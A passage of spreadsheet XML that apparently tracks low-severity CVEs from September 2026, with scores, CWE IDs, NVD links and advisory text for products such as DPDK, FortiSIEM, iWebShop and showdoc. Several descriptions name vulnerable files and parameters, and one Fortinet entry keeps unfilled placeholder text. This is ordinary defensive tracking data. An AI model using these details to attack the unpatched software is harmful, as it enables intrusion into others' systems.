t="inlineStr" /><c r="H1541" s="5" t="n"><v>0.001</v></c><c r="I1541" s="5" t="inlineStr" /><c r="J1541" s="5" t="inlineStr" /><c r="K1541" s="5" t="inlineStr" /><c r="L1541" s="5" t="inlineStr" /><c r="M1541" s="5" t="inlineStr" /><c r="N1541" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1541" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1541" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1541" s="5" t="inlineStr" /><c r="R1541" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1541" s="5" t="inlineStr"><is><t>A flaw was found in DPDK lib/vhost. Missing length validation before reading command_data in the virtio-net control-queue handler can cause an out-of-bounds read and a host process crash.</t></is></c><c r="T1541" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86564</t></is></c></row><row r="1542"><c r="A1542" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1542" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1542" s="5" t="inlineStr"><is><t>CVE-2026-28652</t></is></c><c r="D1542" s="5" t="n"><v>3.1</v></c><c r="E1542" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1542" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1542" s="5" t="inlineStr" /><c r="H1542" s="5" t="n"><v>0.002</v></c><c r="I1542" s="5" t="inlineStr" /><c r="J1542" s="5" t="inlineStr" /><c r="K1542" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1542" s="5" t="inlineStr" /><c r="M1542" s="5" t="inlineStr" /><c r="N1542" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1542" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1542" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1542" s="5" t="inlineStr" /><c r="R1542" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1542" s="5" t="inlineStr"><is><t>In multiple functions of RangingServiceImpl.java, there is a possible MITM due to a missing permission check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1542" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28652</t></is></c></row><row r="1543"><c r="A1543" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1543" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1543" s="5" t="inlineStr"><is><t>CVE-2026-48707</t></is></c><c r="D1543" s="5" t="n"><v>3.1</v></c><c r="E1543" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1543" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1543" s="5" t="inlineStr" /><c r="H1543" s="5" t="n"><v>0.002</v></c><c r="I1543" s="5" t="inlineStr" /><c r="J1543" s="5" t="inlineStr" /><c r="K1543" s="5" t="inlineStr" /><c r="L1543" s="5" t="inlineStr" /><c r="M1543" s="5" t="inlineStr" /><c r="N1543" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1543" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1543" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1543" s="5" t="inlineStr" /><c r="R1543" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1543" s="5" t="inlineStr"><is><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is></c><c r="T1543" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-48707</t></is></c></row><row r="1544"><c r="A1544" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1544" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1544" s="5" t="inlineStr"><is><t>CVE-2026-84389</t></is></c><c r="D1544" s="5" t="n"><v>3.1</v></c><c r="E1544" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1544" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1544" s="5" t="inlineStr" /><c r="H1544" s="5" t="n"><v>0.001</v></c><c r="I1544" s="5" t="inlineStr" /><c r="J1544" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1544" s="5" t="inlineStr" /><c r="L1544" s="5" t="inlineStr" /><c r="M1544" s="5" t="inlineStr" /><c r="N1544" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1544" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1544" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1544" s="5" t="inlineStr" /><c r="R1544" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S1544" s="5" t="inlineStr"><is><t>A url redirection to untrusted site ('open redirect') vulnerability in Fortinet FortiSIEM 7.5.0 through 7.5.1, FortiSIEM 7.4.1 through 7.4.2 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t></is></c><c r="T1544" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84389</t></is></c></row><row r="1545"><c r="A1545" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1545" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1545" s="5" t="inlineStr"><is><t>CVE-2026-86670</t></is></c><c r="D1545" s="5" t="n"><v>2.9</v></c><c r="E1545" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1545" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1545" s="5" t="inlineStr" /><c r="H1545" s="5" t="n"><v>0.003</v></c><c r="I1545" s="5" t="inlineStr" /><c r="J1545" s="5" t="inlineStr" /><c r="K1545" s="5" t="inlineStr" /><c r="L1545" s="5" t="inlineStr" /><c r="M1545" s="5" t="inlineStr" /><c r="N1545" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1545" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1545" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1545" s="5" t="inlineStr" /><c r="R1545" s="5" t="inlineStr"><is><t>CWE-326, CWE-916</t></is></c><c r="S1545" s="5" t="inlineStr"><is><t>A flaw has been found in aircheng-org iWebShop-5 up to 5.15. This impacts an unknown function of the file controllers/admin.php of the component Authentication Storage. Executing a manipulation of the argument Password can lead to password hash with insufficient computational effort. It is possible to launch the attack remotely. A high complexity level is associated with this attack. The exploitability is said to be difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1545" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86670</t></is></c></row><row r="1546"><c r="A1546" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1546" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1546" s="5" t="inlineStr"><is><t>CVE-2026-84392</t></is></c><c r="D1546" s="5" t="n"><v>2.7</v></c><c r="E1546" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1546" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1546" s="5" t="inlineStr" /><c r="H1546" s="5" t="n"><v>0.003</v></c><c r="I1546" s="5" t="inlineStr" /><c r="J1546" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1546" s="5" t="inlineStr" /><c r="L1546" s="5" t="inlineStr" /><c r="M1546" s="5" t="inlineStr" /><c r="N1546" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1546" s="5" t="inlineStr" /><c r="R1546" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1546" s="5" t="inlineStr"><is><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is></c><c r="T1546" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84392</t></is></c></row><row r="1547"><c r="A1547" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1547" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1547" s="5" t="inlineStr"><is><t>CVE-2026-82060</t></is></c><c r="D1547" s="5" t="n"><v>2.3</v></c><c r="E1547" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1547" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1547" s="5" t="inlineStr" /><c r="H1547" s="5" t="n"><v>0.002</v></c><c r="I1547" s="5" t="inlineStr" /><c r="J1547" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1547" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1547" s="5" t="inlineStr" /><c r="M1547" s="5" t="inlineStr" /><c r="N1547" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1547" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1547" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1547" s="5" t="inlineStr" /><c r="R1547" s="5" t="inlineStr"><is><t>CWE-943</t></is></c><c r="S1547" s="5" t="inlineStr"><is><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is></c><c r="T1547" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82060</t></is></c></row><row r="1548"><c r="A1548" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1548" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1548" s="5" t="inlineStr"><is><t>CVE-2026-82710</t></is></c><c r="D1548" s="5" t="n"><v>2.3</v></c><c r="E1548" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1548" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1548" s="5" t="inlineStr" /><c r="H1548" s="5" t="n"><v>0.004</v></c><c r="I1548" s="5" t="inlineStr" /><c r="J1548" s="5" t="inlineStr" /><c r="K1548" s="5" t="inlineStr" /><c r="L1548" s="5" t="inlineStr" /><c r="M1548" s="5" t="inlineStr" /><c r="N1548" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1548" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1548" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1548" s="5" t="inlineStr" /><c r="R1548" s="5" t="inlineStr"><is><t>CWE-150</t></is></c><c r="S1548" s="5" t="inlineStr"><is><t>Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in ash-project usage_rules allows a malicious package publisher to inject terminal control sequences into the output of mix usage_rules.search_docs.

mix usage_rules.search_docs searches Hex documentation through search.hexdocs.pm, which indexes the documentation of every published package, and prints the matching results (title, package, type, doc reference, and highlighted snippets) to the terminal. The formatter in Mix.Tasks.UsageRules.SearchDocs interpolated those publisher-controlled fields verbatim, neutralizing no terminal control characters; the only transform it applied adds escape sequences rather than removing them. A malicious package can embed ANSI terminal escape sequences (cursor movement, line erase, carriage returns, OSC 52 clipboard writes) in its indexed documentation, so when a developer runs a search that surfaces those docs the sequences reach the terminal unchanged — forging the displayed hexdocs URL or a suggested command, hiding text, or writing to the clipboard. No authentication or privileged position is required; only publishing a package.

This issue affects usage_rules: from 0.1.18 before 1.2.8.</t></is></c><c r="T1548" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82710</t></is></c></row><row r="1549"><c r="A1549" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1549" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1549" s="5" t="inlineStr"><is><t>CVE-2026-58234</t></is></c><c r="D1549" s="5" t="n"><v>2.2</v></c><c r="E1549" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1549" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1549" s="5" t="inlineStr" /><c r="H1549" s="5" t="n"><v>0.002</v></c><c r="I1549" s="5" t="inlineStr" /><c r="J1549" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1549" s="5" t="inlineStr" /><c r="L1549" s="5" t="inlineStr" /><c r="M1549" s="5" t="inlineStr" /><c r="N1549" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1549" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1549" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1549" s="5" t="inlineStr" /><c r="R1549" s="5" t="inlineStr"><is><t>CWE-776</t></is></c><c r="S1549" s="5" t="inlineStr"><is><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is></c><c r="T1549" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58234</t></is></c></row><row r="1550"><c r="A1550" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1550" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1550" s="5" t="inlineStr"><is><t>CVE-2026-86512</t></is></c><c r="D1550" s="5" t="n"><v>2.1</v></c><c r="E1550" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1550" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1550" s="5" t="inlineStr" /><c r="H1550" s="5" t="n"><v>0.002</v></c><c r="I1550" s="5" t="inlineStr" /><c r="J1550" s="5" t="inlineStr" /><c r="K1550" s="5" t="inlineStr" /><c r="L1550" s="5" t="inlineStr" /><c r="M1550" s="5" t="inlineStr" /><c r="N1550" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1550" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1550" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1550" s="5" t="inlineStr" /><c r="R1550" s="5" t="inlineStr"><is><t>CWE-266, CWE-284</t></is></c><c r="S1550" s="5" t="inlineStr"><is><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is></c><c r="T1550" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86512</t></is></c></row><row r="1551"><c r="A1551" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1551" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1551" s="5" t="inlineStr"><is><t>CVE-2026-86514</t></is></c><c r="D1551" s="5" t="n"><v>2.1</v></c><c r="E1551" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1551" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1551" s="5" t="inlineStr" /><c r="H1551" s="5" t="n"><v>0.003</v></c><c r="I1551" s="5" t="inlineStr" /><c r="J1551" s="5" t="inlineStr" /><c r="K1551" s="5" t="inlineStr" /><c r="L1551" s="5" t="inlineStr" /><c r="M1551" s="5" t="inlineStr" /><c r="N1551" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1551" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1551" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1551" s="5" t="inlineStr" /><c r="R1551" s="5" t="inlineStr"><is><t>CWE-119, CWE-121</t></is></c><c r="S1551" s="5" t="inlineStr"><is><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is></c><c r="T1551" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86514</t></is></c></row><row r="1552"><c r="A1552" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1552" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1552" s="5" t="inlineStr"><is><t>CVE-2026-86515</t></is></c><c r="D1552" s="5" t="n"><v>2.1</v></c><c r="E1552" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1552" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1552" s="5" t="inlineStr" /><c r="H1552" s="5" t="n"><v>0.003</v></c><c r="I1552" s="5" t="inlineStr" /><c r="J1552" s="5" t="inlineStr" /><c r="K1552" s="5" t="inlineStr" /><c r="L1552" s="5" t="inlineStr" /><c r="M1552" s="5" t="inlineStr" /><c r="N1552" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1552" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1552" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1552" s="5" t="inlineStr" /><c r="R1552" s="5" t="inlineStr"><is><t>CWE-400, CWE-404</t></is></c><c r="S1552" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in vgmstream up to r2117. Impacted is the function add_entry of the file src/meta/txtp_parser.c of the component txtp. Such manipulation of the argument range_start/range_end leads to resource consumption. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The name of the patch is 4b6a02dd1aff6428255db912563d77d4cb0a143e. It is advisable to implement a patch to correct this issue.</t></is></c><c r="T1552" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86515</t></is></c></row><row r="1553"><c r="A1553" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1553" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1553" s="5" t="inlineStr"><is><t>CVE-2026-86517</t></is></c><c r="D1553" s="5" t="n"><v>2.1</v></c><c r="E1553" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1553" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1553" s="5" t="inlineStr" /><c r="H1553" s="5" t="n"><v>0.002</v></c><c r="I1553" s="5" t="inlineStr" /><c r="J1553" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1553" s="5" t="inlineStr" /><c r="L1553" s="5" t="inlineStr" /><c r="M1553" s="5" t="inlineStr" /><c r="N1553" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1553" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1553" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1553" s="5" t="inlineStr" /><c r="R1553" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1553" s="5" t="inlineStr"><is><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is></c><c r="T1553" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86517</t></is></c></row><row r="1554"><c r="A1554" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1554" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1554" s="5" t="inlineStr"><is><t>CVE-2026-86518</t></is></c><c r="D1554" s="5" t="n"><v>2.1</v></c><c r="E1554" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1554" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1554" s="5" t="inlineStr" /><c r="H1554" s="5" t="n"><v>0.002</v></c><c r="I1554" s="5" t="inlineStr" /><c r="J1554" s="5" t="inlineStr" /><c r="K1554" s="5" t="inlineStr" /><c r="L1554" s="5" t="inlineStr" /><c r="M1554" s="5" t="inlineStr" /><c r="N1554" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1554" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1554" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1554" s="5" t="inlineStr" /><c r="R1554" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1554" s="5" t="inlineStr"><is><t>A vulnerability has been found in code-projects Student Crud Operation 1.0. This affects an unknown function of the file /edit.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.</t></is></c><c r="T1554" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86518</t></is></c></row><row r="1555"><c r="A1555" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1555" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1555" s="5" t="inlineStr"><is><t>CVE-2026-86668</t></is></c><c r="D1555" s="5" t="n"><v>2.1</v></c><c r="E1555" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1555" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1555" s="5" t="inlineStr" /><c r="H1555" s="5" t="n"><v>0.003</v></c><c r="I1555" s="5" t="inlineStr" /><c r="J1555" s="5" t="inlineStr" /><c r="K1555" s="5" t="inlineStr" /><c r="L1555" s="5" t="inlineStr" /><c r="M1555" s="5" t="inlineStr" /><c r="N1555" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1555" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1555" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1555" s="5" t="inlineStr" /><c r="R1555" s="5" t="inlineStr"><is><t>CWE-79, CWE-94</t></is></c><c r="S1555" s="5" t="inlineStr"><is><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is></c><c r="T1555" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86668</t></is></c></row><row r="1556"><c r="A1556" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1556" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1556" s="5" t="inlineStr"><is><t>CVE-2026-86674</t></is></c><c r="D1556" s="5" t="n"><v>2.1</v></c><c r="E1556" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1556" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1556" s="5" t="inlineStr" /><c r="H1556" s="5" t="n"><v>0.002</v></c><c r="I1556" s="5" t="inlineStr" /><c r="J1556" s="5" t="inlineStr" /><c r="K1556" s="5" t="inlineStr" /><c r="L1556" s="5" t="inlineStr" /><c r="M1556" s="5" t="inlineStr" /><c r="N1556" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1556" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1556" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1556" s="5" t="inlineStr" /><c r="R1556" s="5" t="inlineStr"><is><t>CWE-384</t></is></c><c r="S1556" s="5" t="inlineStr"><is><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is></c><c r="T1556" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86674</t></is></c></row><row r="1557"><c r="A1557" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1557" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1557" s="5" t="inlineStr"><is><t>CVE-2026-86675</t></is></c><c r="D1557" s="5" t="n"><v>2.1</v></c><c r="E1557" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1557" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1557" s="5" t="inlineStr" /><c r="H1557" s="5" t="n"><v>0.002</v></c><c r="I1557" s="5" t="inlineStr" /><c r="J1557" s="5" t="inlineStr" /><c r="K1557" s="5" t="inlineStr" /><c r="L1557" s="5" t="inlineStr" /><c r="M1557" s="5" t="inlineStr" /><c r="N1557" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1557" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1557" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1557" s="5" t="inlineStr" /><c r="R1557" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1557" s="5" t="inlineStr"><is><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is></c><c r="T1557" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86675</t></is></c></row><row r="1558"><c r="A1558" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1558" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1558" s="5" t="inlineStr"><is><t>CVE-2026-16003</t></is></c><c r="D1558" s="5" t="n"><v>2</v></c><c r="E1558" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1558" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1558" s="5" t="inlineStr" /><c r="H1558" s="5" t="n"><v>0.001</v></c><c r="I1558" s="5" t="inlineStr" /><c r="J1558" s="5" t="inlineStr" /><c r="K1558" s="5" t="inlineStr" /><c r="L1558" s="5" t="inlineStr" /><c r="M1558" s="5" t="inlineStr" /><c r="N1558" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1558" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1558" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1558" s="5" t="inlineStr" /><c r="R1558" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="S1558" s="5" t="inlineStr"><is><t>Exposed IOCTL with Insufficient Access Control in Armoury Crate driver allows a local user to add an arbitrary process identifier to the driver's whitelist via a crafted IOCTL request by bypassing the driver's verification.Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1558" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16003</t></is></c></row><row r="1559"><c r="A1559" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1559" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1559" s="5" t="inlineStr"><is><t>CVE-2026-86644</t></is></c><c r="D1559" s="5" t="n"><v>2</v></c><c r="E1559" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1559" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1559" s="5" t="inlineStr" /><c r="H1559" s="5" t="n"><v>0.003</v></c><c r="I1559" s="5" t="inlineStr" /><c r="J1559" s="5" t="inlineStr" /><c r="K1559" s="5" t="inlineStr" /><c r="L1559" s="5" t="inlineStr" /><c r="M1559" s="5" t="inlineStr" /><c r="N1559" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1559" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1559" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1559" s="5" t="inlineStr" /><c r="R1559" s="5" t="inlineStr"><is><t>CWE-79, CWE-94</t></is></c><c r="S1559" s="5" t="inlineStr"><is><t>A vulnerability was determined in star7th showdoc up to 3.9.1. This vulnerability affects unknown code of the file web_src/public/editor.md/editormd.js of the component API Page Save Endpoint. Executing a manipulation can lead to cross site scripting. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 3.9.2 is able to resolve this issue. This patch is called a8ea1520850b4242f395247f72e87e597506cef0. Upgrading the affected component is recommended. The vendor confirms: "The fix [...] sets Mermaid `securityLevel` to `strict`, disables `htmlLabels`, and sanitizes rendered SVG with DOMPurify."</t></is></c><c r="T1559" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86644</t></is></c></row><row r="1560"><c r="A1560" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1560" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1560" s="5" t="inlineStr"><is><t>CVE-2026-86667</t></is></c><c r="D1560" s="5" t="n"><v>2</v></c><c r="E1560" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1560" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1560" s="5" t="inlineStr" /><c r="H1560" s="5" t="n"><v>0.002</v></c><c r="I1560" s="5" t="inlineStr" /><c r="J1560" s="5" t="inlineStr" /><c r="K1560" s="5" t="inlineStr" /><c r="L1560" s="5" t="inlineStr" /><c r="M1560" s="5" t="inlineStr" /><c r="N1560" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1560" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1560" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1560" s="5" t="inlineStr" /><c r="R1560" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1560" s="5" t="inlineStr"><is><t>A weakness has been identified in aircheng-org iWebShop-5 up to 5.15. The affected element is the function member_list of the file controllers/member.php. This manipulation of the argument Search causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1560" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86667</t></is></c></row><row r="1561"><c r="A1561" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1561" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1561" s="5" t="inlineStr"><is><t>CVE-2026-9215</t></is></c><c r="D1561" s="5" t="n"><v>1.8</v></c><c r="E1561" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1561" s="5" t="inlineStr"><is><t>a2826606-91e7-4eb6-899e-8484bd4575d5</t></is></c><c r="G1561" s="5" t="inlineStr" /><c r="H1561" s="5" t="n"><v>0.001</v></c><c r="I1561" s="5" t="inlineStr" /><c r="J1561" s="5" t="inlineStr" /><c r="K1561" s="5" t="inlineStr"><is><t>netgear:xr1000, netgear:xr1000_firmware, netgear:xr1000v2, netgear:xr1000v2_firmware, netgear:xr500, netgear:xr500_firmware</t></is></c><c r="L1561" s="5" t="inlineStr" /><c r="M1561" s="5" t="inlineStr" /><c r="N1561" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1561" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1561" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1561" s="5" t="inlineStr" /><c r="R1561" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1561" s="5" t="inlineStr"><is><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is></c><c r="T1561" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9215</t></is></c></row><row r="1562"><c r="A1562" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1562" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1562" s="5" t="inlineStr"><is><t>CVE-2026-9216</t></is></c><c r="D1562" s="5" t="n"><v>1.2</v></c><c 